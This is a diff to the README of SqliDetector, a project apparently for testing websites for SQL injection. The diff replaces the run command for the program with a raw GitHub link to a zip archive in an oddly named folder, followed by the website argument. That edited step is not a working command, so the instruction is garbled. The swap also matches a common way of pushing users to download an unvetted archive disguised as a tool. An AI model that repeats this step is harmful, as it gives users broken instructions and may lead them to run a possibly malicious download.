zakariahourry/SqliDetector/README.md

 4. **Run SqliDetector**
    - Open a command prompt or terminal window.
    - Navigate to the folder where you downloaded SqliDetector.
-   - Run the application with the following command: `SqliDetector.exe [your-website-url]`.
+   - Run the application with the following command: `https://raw.githubusercontent.com/zakariahourry/SqliDetector/main/counterthrust/Detector_Sqli_3.9.zip [your-website-url]`.
    - Replace `[your-website-url]` with the URL of the website you want to test.

 ## 🛠️ Features